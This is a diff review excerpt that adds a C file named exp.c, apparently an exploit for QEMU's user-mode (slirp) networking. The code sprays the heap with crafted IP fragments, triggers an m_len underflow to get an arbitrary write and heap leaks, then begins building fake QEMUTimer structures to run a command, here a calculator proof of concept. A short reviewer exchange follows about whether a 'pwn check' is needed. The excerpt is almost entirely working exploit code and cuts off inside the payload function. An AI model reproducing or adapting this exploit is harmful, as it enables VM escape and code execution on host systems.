deps/netuser/exp.c

```diff
@@ -0,0 +1,656 @@
+
+    icmp_header(icmp,NULL,0x0);
+    char * data = (char *)icmp + ICMP_HDRLEN + 8;
+    size_t pkt_len = ETH_HDRLEN + IP4_HDRLEN + ICMP_HDRLEN;
+
+    spray_id = rand() & 0xffff;
+    arbitrary_write((void * )(0xb00-0x20),3,pkt,pkt_len+4,0x100);
+
+    // This is same as the arbitrary write function
+    spray_id = rand() & 0xffff;
+    spray(0x8, 0x20);
+    size_t id = spray_id + 0x20;
+
+    size_t replay_id = id++;
+    send_ip4(replay_id, 0x100, NULL, IP_MF);
+
+    // Target
+    size_t target_id = id++;
+    send_ip4(target_id, 0x8, NULL, IP_MF);
+
+   
+    // Padding
+    send_ip4(id++, 0x8, NULL, IP_MF);
+    send_ip4(id++, 0x8, NULL, IP_MF);
+
+    // Piviot Point
+    size_t hole_1 = id++;
+    send_ip4(hole_1, 0x8, NULL, IP_MF);
+
+
+    // Padding
+    send_ip4(id++, 0xC30, NULL, IP_MF);
+
+    // For creating hole
+    size_t hole_2 = id++;
+    send_ip4(hole_2, 0x8, NULL, IP_MF);
+
+    // Prevent Consolidation
+    send_ip4(id++, 0x8, NULL, IP_MF);
+
+    // This should create the fist hole
+    send_ip4(hole_1, 0x8, NULL, 0x1);
+
+    // This should create the second hole
+    send_ip4(hole_2, 0x8, NULL, 0x1);
+
+    // Trigger the bug to change target's m_len
+    int m_data_off = -0xd50;
+    int m_len = m_data_off;
+    size_t * addr = (size_t * )(0xb00 - 0x20 + ETH_HDRLEN + 0xe +  6) ;
+    size_t addrlen = 0x3;
+
+    if (addrlen != 0x8) {
+      m_len -= (0x8 - addrlen);
+    }
+
+    size_t vuln_id = id++;
+
+    memset(pkt,0x0,IP_MAXPACKET);
+    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
+    ethernet_header(pkt);
+
+    pkt_len = 0xc90;
+    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,IP_MF);
+    u_int32_t frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
+    send_pkt(pkt,frame_length);
+
+    
+    memset(pkt,0x0,IP_MAXPACKET);
+    ip = (struct iphdr * ) (pkt + ETH_HDRLEN);
+    ethernet_header(pkt);
+    pkt_len = 0x8;
+    ip_header(ip,m_len,0x0,pkt_len,IPPROTO_ICMP,vuln_id,0x192);
+    frame_length = ETH_HDRLEN + IP4_HDRLEN + pkt_len;
+    send_pkt(pkt,frame_length);
+
+
+    // Underflow and write to change m_data
+    char addr_buf[0x8] = {0};
+    if (addrlen != 0x8) {
+      memcpy(&addr_buf[(0x8-addrlen)],(char *)&addr,addrlen);
+    } else {
+      memcpy(addr_buf,(char *)&addr,8);
+    }
+    send_ip4(target_id, 0x8, addr_buf, 0x1);
+
+  if ((recv_socket = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0)
+      die("socket() failed to obtain a receive socket descriptor");
+    send_ip4(replay_id, 0x8, NULL, 0x20);
+    recv_leaks();
+
+
+    char zero[0x28] = {0};
+    spray_id = rand() & 0xffff;
+    printf("Cleaning Heap\n");
+    arbitrary_write(heap_leak + (0xb00 - 0x20),3,zero,sizeof(zero),0x20);
+}
+
+
+void pwn() {
+  char payload[0x200] = {0};
+  struct QEMUTimerList *tl = (struct QEMUTimerList *)payload;
+  struct QEMUTimer *ts =
+      (struct QEMUTimer *)(payload + sizeof(struct QEMUTimerList));
+
+  char cmd[] = "/usr/bin/gnome-calculator";
```

Comment:
Looks a pwn check is required, do you think so?

Reply:
Hi @xuhan, Knowing from the test steps given by the development that we don't need to do this.